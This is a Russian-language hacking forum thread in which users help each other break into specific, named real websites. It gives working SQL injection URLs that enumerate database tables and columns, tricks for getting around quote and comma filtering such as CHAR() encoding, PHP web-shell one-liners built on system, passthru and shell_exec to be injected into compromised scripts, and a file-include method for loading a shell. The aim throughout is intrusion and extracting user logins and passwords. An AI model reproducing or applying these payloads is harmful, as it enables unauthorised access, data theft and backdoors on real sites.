TO mindw0rk: Изначально цель другая была ..а это один из сервисов. Ошибка выдается при обращении http://baltportal.ru/index.php?type=500&idNews=7338' раз уж уважаемый mindw0rk все раскусил=)
не вижу проблеммы Code: http://baltportal.ru/index.php?type=500&idNews=-7338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* копай там 5 мускул имхо выборка из базы в пхп засабачена (@) поэтому то переменные не инициализируются а при правильном запросе все присваивается
php инекция извиняюсь за ламерский вопрос... просто я в php вобще ноль... вобщем допустим я нашол дырявый сайт и нашол несколько скриптов которые можно "поправить" вопрос как мне в них внедрить свой маленький шел т.е. мне нужна только командная строка... пытался сделать так: PHP: <? код скрипта ?> <? system($_GET['c']); ?> неработает.... и вот так пытался PHP: <? код скрипта system($_GET['c']); ?> тоже нехочет работать... подскажите как правильно это сделать?
скорее всего запрещенно выполнение команды system в php.ini попробуй несколько других функций типа passthru($_GET['c']), shell_exec($_GET['c']) если мне не изменяет память есть еще несколько но скорее всего они тоже запрещенны. ЗЫ еще поробуй вот так Code: <?php код скрипта system($_GET['c']); ?>
попробуй вот это вставить вначале скрипта Code: <? @system($_GET['cmd']); ?> если не стоит safemode и system не отключена должно работать, а если всетаки все отключено можешь так Code: <? @include($_GET['incld']); ?> и будешь вызывать так: http://сайт.дмн/скрипт.пхп?incld=путь до твоего шелла и инклюдь шелл
Немогу выполнить такой вот запрос. htt_p://la2.spark-games.ru/la2info/?part=items&id=1'+or+1=(select+top+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('skill_acquire'))-- В чём проблема?
Попробовал выполнить с двойными ковычками в имени таблицы, получил имя второй (sa_names), дальше нету Не пойму ???
там еще запятые фильтруются, делай по такому принципу: Code: http://la2.spark-games.ru/la2info/?part=items&id=1+or+1=(select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+(TABLE_NAME+NOT+IN+(%22skill_acquire%22))%20and%20TABLE_NAME+NOT+IN+(%22sa_names%22))-- 3-я таблица skill_names и т.д.
Осталась ещё одна проблемка. Кто сможет вывести данные? Там фильтруеться знак ; Другими способами тоже не получилось.
Народ подскажите что делать дальшо (вроде inj и даже inc нашол но нормально ковырнуть неполучаеццо) ... inj1 _http://www.att.su/obves_kat/index.php?cat=22222+union+select+1,version(),3,4,5 /*&sub_cat=224&p=1'/* inj2 _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,database(),u ser(),5/*&p=1'/* локальный инклуд _http://www.att.su/alessio_wheels/index.php?disk=./../../index Табличку подобрать никак неполучаеццо.. да и заинклудить чтонить стоящее тоже... И кста есть ли какойнить софтег/скриптег для автоматического подбора таблиц, а также имеюццо-ли способы узнать имя таблички без перебора? *добавлено* Всю ночь я возился с этим сайтом... выдрал все имена таблиц посредствам такой конструкции... _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name,5+from+information_schema.tables+limit+73,1/ Но мля, из табличек ничего нечитается... что делать??? http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name='g2_User'/* Такой запрос выдаёт "Query failed" Версия сервака: 5.0.24a-log Юзер и хост: att_su@localhost название бд: att_su Таблички Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS KEN_categories KEN_detal KEN_picture KEN_products SS_categories SS_detal SS_picture SS_products SS_subcategories cesp_expand cesp_prebuild g2_AccessMap g2_AccessSubscriberMap g2_AlbumItem g2_AnimationItem g2_CacheMap g2_ChildEntity g2_Comment g2_DataItem g2_Derivative g2_DerivativeImage g2_DerivativePrefsMap g2_DescendentCountsMap g2_Entity g2_ExternalIdMap g2_FactoryMap g2_FailedLoginsMap g2_FileSystemEntity g2_Group g2_ImageBlockCacheMap g2_ImageBlockDisabledMap g2_Item g2_ItemAttributesMap g2_Lock g2_MaintenanceMap g2_MovieItem g2_PermalinksMap g2_PermissionSetMap g2_PhotoItem g2_PluginMap g2_PluginPackageMap g2_PluginParameterMap g2_RecoverPasswordMap g2_RssMap g2_Schema g2_SequenceId g2_SequenceLock g2_SessionMap g2_TkOperatnMap g2_TkOperatnMimeTypeMap g2_TkOperatnParameterMap g2_TkPropertyMap g2_TkPropertyMimeTypeMap g2_UnknownItem g2_User g2_UserGroupMap g2_WatermarkImage Умные люди, подскажите как можно поступить в такой ситуации?
Все выводиться, вот запрос http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=CHAR(103,50,95,85,115,101,114)/* Кавычки вообщето нужны обязательно, но в данном случае у нас фильтруються кавычки, потому делаем CHAR(103,50,95,85,115,101,114) что равно g2_User - без кавычек. Во блин, а вывод из таблиц не смог выполнить... та же ошибка в запросе
Спасибо огромное, всё выводится, просто руки у меня кривые - я непрально скопировал, с пробелом в name... http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_name=CHAR(103,50,95,85,115,101,114)/* подскжите плз утилитку для перевода в CHAR ? ))
someshit.net/tools/char.php someshit.net/tools/encoder.php по мне удобней хексить \= а вообще на твоем месте я бы залил шелл через инклуд.. быстрее и удобней updated ЗЫ magic quotes 1, не получится через него залить )) ya_mag пробуй разные системные ф-ии passthru($cmd) shell_exec($cmd) и тд, т.к. возможен safe_mod с disable ф-ии system
Доброго времени суток. Такой вопрос, есть ли способ осуществить SQL-injection, на сайте где работы с БД используется Parameterized Input и Stored Procedures ? Т.е. данные от пользователя сначала заносяться в специальный объект например: parameter = new SqlParameter("name", SqlDbType.VarChar); parameter.Value = txtUserInput.Text; При этом они проверяются на тип/размер. А после передаются в stored procedure. Спасибо.
Есть форма. При подcтановке в поле user ', вылетает ошибка синтаксиса. Url имеет следующий вид: Code: ...php?username=%27&credit=1&unit=false&submit=%D0%9F%... т.к. поле для имени пользователя, то пробелы фильтруются, пробую обойти Code: ...php?username=-1/**/order/**/by/**/1/*&credit=1&unit=false&submit=%D0%9F%... получаю туже форму, нормально, идем дальше, увеличил запрос на 20, та же форма, на 30, с дуру прописал 8888, все та же форма и без ошибки. Можно с этим что то сделать?
прива всем такая ситуация.. я нашел что на сайте есть таблицы users а там колумны login и password такая фигня я ввожу запрос id=-1+union+select+1,login,3,4+from+users+limit+1,1/* послаю запрос он мне выводит Table 'pincode.user' doesn't exist я бы еще согласился если бы там было Table 'user' doesn't exist но причем тут pincode.user что предложите ???
это имя базы, если ты работаешь с 5 веткой, то посмотри параметр table_schema. Таблица user может существовать но в другой базе, обратишся к ней в форме имя_базы.user
